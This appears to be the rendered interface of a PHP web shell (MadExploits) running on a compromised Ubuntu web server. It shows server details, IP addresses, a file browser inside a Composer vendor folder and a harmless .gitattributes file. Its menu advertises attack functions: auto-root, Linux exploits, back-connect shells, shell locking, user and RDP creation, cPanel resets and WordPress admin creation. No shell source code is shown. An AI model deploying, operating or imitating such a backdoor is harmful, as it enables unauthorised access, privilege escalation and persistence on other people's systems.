Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
vendor /
composer /
composer /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxr-x
doc
[ DIR ]
drwxrwxr-x
res
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.editorconfig
155
B
-rw-rw-r--
.gitattributes
833
B
-rw-rw-r--
.gitignore
142
B
-rw-rw-r--
CHANGELOG.md
89.83
KB
-rw-rw-r--
CODE_OF_CONDUCT.md
3.27
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
PORTING_INFO
1.56
KB
-rw-rw-r--
README.md
2.35
KB
-rw-rw-r--
UPGRADE-2.0.md
10.31
KB
-rw-rw-r--
composer.json
3.39
KB
-rw-rw-r--
composer.lock
55.25
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .gitattributes
# Auto-detect text files, ensure they use LF. * text=auto eol=lf # These files are always considered text and should use LF. # See core.whitespace @ https://git-scm.com/docs/git-config for whitespace flags. *.php text eol=lf whitespace=blank-at-eol,blank-at-eof,space-before-tab,tab-in-indent,tabwidth=4 diff=php *.json text eol=lf whitespace=blank-at-eol,blank-at-eof,space-before-tab,tab-in-indent,tabwidth=4 *.test text eol=lf whitespace=blank-at-eol,blank-at-eof,space-before-tab,tab-in-indent,tabwidth=4 *.yml text eol=lf whitespace=blank-at-eol,blank-at-eof,space-before-tab,tab-in-indent,tabwidth=2 # Exclude non-essential files from dist /tests export-ignore .github export-ignore .php_cs export-ignore .travis.yml export-ignore appveyor.yml export-ignore phpunit.xml.dist export-ignore /phpstan/ export-ignore
Close